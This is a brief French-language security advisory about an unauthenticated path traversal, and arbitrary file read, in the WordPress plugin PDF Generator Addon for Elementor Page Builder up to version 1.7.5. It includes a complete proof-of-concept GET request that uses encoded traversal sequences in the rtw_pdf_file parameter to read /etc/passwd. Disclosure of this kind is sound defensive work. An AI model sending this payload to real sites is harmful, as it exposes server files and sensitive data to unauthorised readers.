
PDF Generator Addon pour Elementor Page Builder <= 1.7.5 - Téléchargement arbitraire de fichier non authentifié
PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Téléchargement arbitraire de fichiers non authentifié
Le plugin PDF Generator Addon for Elementor Page Builder pour WordPress est vulnérable à un Path Traversal dans toutes les versions jusqu'à la 1.7.5 incluse via la fonction rtw_pgaepb_dwnld_pdf(). Cela permet à des attaquants non authentifiés de lire le contenu de fichiers arbitraires sur le serveur, qui peuvent contenir des informations sensibles.
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i